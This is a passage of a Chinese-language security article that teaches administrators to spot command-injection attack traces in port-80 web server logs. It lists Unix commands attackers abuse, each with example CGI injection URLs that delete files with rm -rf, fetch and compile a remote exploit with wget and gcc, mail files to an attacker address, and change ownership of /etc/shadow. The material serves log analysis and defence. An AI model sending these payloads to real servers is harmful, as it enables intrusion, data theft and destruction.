[安全]80端口web服务攻击痕迹
它将显示属于哪个用户和属于哪个组
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
"/bin/rm"
这个命令可以删除文件,如果不正确的使用是非常危险的
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
"wget and tftp" 命令
这些命令常被攻击者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c;
"cat" 命令
这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
"echo" 命令
这个命令常用于写数据到文件中,比如“index.html”
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>;>;%200day.txt| http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>;>;%200day.txt;
"ps" 命令
列出当前运行的进程,告诉攻击者远程主机运行了那些软件,以便从中得到一些安全问题的主意,获得进一步的权限
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
"kill and killall" 命令
在unix系统这个命令用于杀掉进程,一个攻击者可以用这个命令来停止系统服务和程序,同时可以擦掉攻击者的痕迹,一些exploit会产生很多的子进程
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
"uname" 命令
这个命令告诉攻击者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个isp,也许是攻击者曾今访问过的。通常uname -a来请求,这些都将记录在日志文件中
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| http://host/cgi-bin/bad.cgi?doh=uname%20-a;
"cc, gcc, perl, python, etc..." 编译/解释命令
攻击者通过wget或者tftp下载exploit,并用cc,gcc这样的编译程序进行编译成可执行程序,进一步获得特权
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337;
如果你查看日志中发现有“perl” python”这些说明可能攻击者下载远程的perl ,python脚本程序,并试图本地获得特权
"mail" 命令
攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱,也肯能是进行邮件炸弹的攻击
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@好好学习cnhonker.org%20<<%20/etc/motd|http://host/cgi-bin/bad.cgi?doh=mail%20steele@jersey.whitehouse.gov%20<</tmp/wu-2.6.1.c;
"chown, chmod, chgrp, chsh, etc..." 等命令
在unix系统这些命令允许改变文件的许可权限
chown = 允许设置文件的拥有者chmod = 允许设置文件的许可权限chgrp = 允许改变组对文件的拥有权限chsh = 允许改变用户的shell
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.html| http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd| http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/shadow|
